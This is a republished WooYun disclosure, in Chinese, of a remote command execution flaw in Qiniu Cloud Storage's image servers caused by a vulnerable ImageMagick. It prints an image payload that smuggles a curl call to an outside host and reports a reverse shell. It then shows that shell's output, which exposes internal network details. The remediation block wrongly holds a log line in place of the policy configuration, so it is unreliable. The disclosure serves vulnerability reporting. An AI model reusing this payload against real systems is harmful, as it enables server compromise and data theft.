七牛云存储远程命令执行漏洞影响图片处理服务器

admin 2017年4月30日08:13:53评论365 views字数 226阅读0分45秒阅读模式
摘要

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

漏洞概要 关注数(46) 关注此漏洞

缺陷编号: WooYun-2016-205290

漏洞标题: 七牛云存储远程命令执行漏洞影响图片处理服务器

相关厂商: 七牛云存储

漏洞作者: 风吹屁屁好特么凉

提交时间: 2016-05-05 14:28

公开时间: 2016-06-19 16:20

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行 第三方不可信程序 补丁不及时

8人收藏


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

七牛云存储远程命令执行漏洞影响图片处理服务器

详细说明:

七牛云存储在业务中使用了 ImageMagick 对程序进行处理,由于该软件(扩展)存在命令执行漏洞,所以导致可以直接获取七牛云存储服务器权限。

漏洞详情请参考:

http://www.openwall.com/lists/oss-security/2016/05/03/18

具体利用过程:调用七牛云存储上传图片,图片内容为:

code 区域
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|curl "*.*.*.*)'
pop graphic-context

我的服务器 web 日志能够收到如下请求:

code 区域
183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"

证明服务器能够执行命令,反弹 shell 到本地:

code 区域
:/home/qboxserver$ /sbin/ifconfig 
/sbin/ifconfig
bond0 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31
inet addr:192.168.39.56 Bcast:192.168.39.255 Mask:255.255.255.0
inet6 addr: fe80::6e92:bfff:fe08:4231/64 Scope:Link
UP BROADCAST RUNNING MASTER MULTICAST MTU:1500 Metric:1
RX packets:1954421513004 errors:296 dropped:109669460 overruns:89056 frame:139
TX packets:1830543349326 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2185589994172355 (2.1 PB) TX bytes:2267435507197833 (2.2 PB)

eth0 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31
UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1
RX packets:1015834290209 errors:296 dropped:3 overruns:57652 frame:139
TX packets:949789646132 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1137441591036452 (1.1 PB) TX bytes:1174420660158860 (1.1 PB)
Memory:df7a0000-df7c0000

eth2 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31
UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1
RX packets:938587222795 errors:0 dropped:3 overruns:31404 frame:0
TX packets:880753703193 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1048148403135903 (1.0 PB) TX bytes:1093014847038820 (1.0 PB)
Memory:df920000-df940000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:41448226032 errors:0 dropped:0 overruns:0 frame:0
TX packets:41448226032 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:271458766242099 (271.4 TB) TX bytes:271458766242099 (271.4 TB)

:/home/qboxserver$
code 区域
:/home/qboxserver$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost nb443
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.1.188 salt puppetmaster
192.168.33.200 zabbixserver bosunserver fileserver.qbox.me
192.168.34.129 nb.fileserver.qbox.me
192.168.48.248 ntp.ubuntu.com

172.16.77.202 qmaster2


172.16.77.201 qmaster1

172.16.77.201 qmaster1
172.16.77.202 qmaster2
code 区域
:/home/qboxserver$ df -h
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 279G 75G 190G 29% /
udev 16G 12K 16G 1% /dev
tmpfs 6.3G 392K 6.3G 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 16G 60K 16G 1% /run/shm
/dev/sde1 3.7T 3.2T 293G 92% /disk1
/dev/sdc1 3.7T 3.3T 220G 94% /disk2
/dev/sdb1 3.7T 3.3T 254G 93% /disk3
/dev/sdd1 3.7T 3.2T 283G 93% /disk4
/dev/sdg1 3.7T 3.3T 203G 95% /disk5
/dev/sdi1 3.7T 3.2T 278G 93% /disk6
/dev/sdh1 3.7T 3.2T 285G 92% /disk7
/dev/sdj1 3.7T 3.3T 245G 94% /disk8
/dev/sdk1 3.7T 3.2T 301G 92% /disk9
/dev/sdl1 3.7T 3.2T 262G 93% /disk10
/dev/sdm1 3.7T 3.3T 256G 93% /disk11
/dev/sdf1 3.7T 56G 3.4T 2% /disk12

挂载了这么多磁盘,有将近 40T 的数据,猜测都是客户上传的静态资源。

漏洞证明:

七牛云存储在业务中使用了 ImageMagick 对程序进行处理,由于该软件(扩展)存在命令执行漏洞,所以导致可以直接获取七牛云存储服务器权限。

漏洞详情请参考:

http://www.openwall.com/lists/oss-security/2016/05/03/18

具体利用过程:调用七牛云存储上传图片,图片内容为:

code 区域
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|curl "*.*.*.*)'
pop graphic-context

我的服务器 web 日志能够收到如下请求:

code 区域
183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"

证明服务器能够执行命令,反弹 shell 到本地:

code 区域
:/home/qboxserver$ /sbin/ifconfig 
/sbin/ifconfig
bond0 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31
inet addr:192.168.39.56 Bcast:192.168.39.255 Mask:255.255.255.0
inet6 addr: fe80::6e92:bfff:fe08:4231/64 Scope:Link
UP BROADCAST RUNNING MASTER MULTICAST MTU:1500 Metric:1
RX packets:1954421513004 errors:296 dropped:109669460 overruns:89056 frame:139
TX packets:1830543349326 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2185589994172355 (2.1 PB) TX bytes:2267435507197833 (2.2 PB)

eth0 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31
UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1
RX packets:1015834290209 errors:296 dropped:3 overruns:57652 frame:139
TX packets:949789646132 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1137441591036452 (1.1 PB) TX bytes:1174420660158860 (1.1 PB)
Memory:df7a0000-df7c0000

eth2 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31
UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1
RX packets:938587222795 errors:0 dropped:3 overruns:31404 frame:0
TX packets:880753703193 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1048148403135903 (1.0 PB) TX bytes:1093014847038820 (1.0 PB)
Memory:df920000-df940000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:41448226032 errors:0 dropped:0 overruns:0 frame:0
TX packets:41448226032 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:271458766242099 (271.4 TB) TX bytes:271458766242099 (271.4 TB)

:/home/qboxserver$
code 区域
:/home/qboxserver$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost nb443
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.1.188 salt puppetmaster
192.168.33.200 zabbixserver bosunserver fileserver.qbox.me
192.168.34.129 nb.fileserver.qbox.me
192.168.48.248 ntp.ubuntu.com

172.16.77.202 qmaster2


172.16.77.201 qmaster1

172.16.77.201 qmaster1
172.16.77.202 qmaster2
code 区域
:/home/qboxserver$ df -h
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 279G 75G 190G 29% /
udev 16G 12K 16G 1% /dev
tmpfs 6.3G 392K 6.3G 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 16G 60K 16G 1% /run/shm
/dev/sde1 3.7T 3.2T 293G 92% /disk1
/dev/sdc1 3.7T 3.3T 220G 94% /disk2
/dev/sdb1 3.7T 3.3T 254G 93% /disk3
/dev/sdd1 3.7T 3.2T 283G 93% /disk4
/dev/sdg1 3.7T 3.3T 203G 95% /disk5
/dev/sdi1 3.7T 3.2T 278G 93% /disk6
/dev/sdh1 3.7T 3.2T 285G 92% /disk7
/dev/sdj1 3.7T 3.3T 245G 94% /disk8
/dev/sdk1 3.7T 3.2T 301G 92% /disk9
/dev/sdl1 3.7T 3.2T 262G 93% /disk10
/dev/sdm1 3.7T 3.3T 256G 93% /disk11
/dev/sdf1 3.7T 56G 3.4T 2% /disk12

挂载了这么多磁盘,有将近 40T 的数据,猜测都是客户上传的静态资源。

修复方案:

使用策略文件暂时禁用ImageMagick。可在“/etc/ImageMagick/policy.xml”文件中添加如下代码:

code 区域
183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"

0

版权声明:转载请注明来源 风吹屁屁好特么凉@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-05 16:19

厂商回复:

感谢您的提示,我们正在修复。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 为表感谢,我们申请了一台iPhone6s,请联系我们领取。

  2. 2016-05-05 17:30 | Yuku ( 实习白帽子 | Rank:58 漏洞数:27 | 数据挖掘)

    0

    @七牛云存储 这么壕。。

  3. 2016-05-05 17:31 | Hax0rs ( 实习白帽子 | Rank:65 漏洞数:13 | Hax0rs)

    0

    土豪厂商

  4. 2016-05-05 17:35 | 光棍节 ( 普通白帽子 | Rank:148 漏洞数:59 | 光棍节)

    0

    土豪厂商

  5. 2016-05-05 17:35 | 红客十年 ( 普通白帽子 | Rank:392 漏洞数:80 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    0

    土豪厂商

  6. 2016-05-05 17:37 | 专业种田 七牛云存储远程命令执行漏洞影响图片处理服务器 ( 核心白帽子 | Rank:1686 漏洞数:214 | 没有最专业的农民,只有更努力地耕耘..........)

    0

    已私信地址

  7. 2016-05-05 17:37 | Yuku ( 实习白帽子 | Rank:58 漏洞数:27 | 数据挖掘)

    0

    已私信地址

  8. 2016-05-05 17:37 | JiuShao ( 普通白帽子 | Rank:495 漏洞数:109 | ╮(╯▽╰)╭锄禾日当午)

    0

    土豪厂商

  9. 2016-05-05 17:41 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

    0

    可怕

  10. 2016-05-05 17:45 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    0

    土豪!

  11. 2016-05-05 17:46 | 包包不是包 ( 路人 | Rank:9 漏洞数:5 | 逛了集市,有目标了,刷个iPhone7s Plus 出来)

    0

    已私信地址

  12. 2016-05-05 18:19 | Praise ( 路人 | Rank:10 漏洞数:1 | null 开心就要笑得如痴如醉~)

    0

    - - 阿里动作很快, 邮件通知了。

  13. 2016-05-05 18:33 | hkAssassin ( 普通白帽子 | Rank:395 漏洞数:73 | 我是一只毛毛虫。)

    0

    确定是真送?

  14. 2016-05-05 19:06 | 中国Cold ( 实习白帽子 | Rank:57 漏洞数:24 | 服重任,行远道,正直而固者,轴也。)

    0

    土豪厂商

  15. 2016-05-05 21:51 | jye33 ( 普通白帽子 | Rank:1340 漏洞数:310 | 没有什么能够阻挡,我对静静的向往)

    0

    已私信地址

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin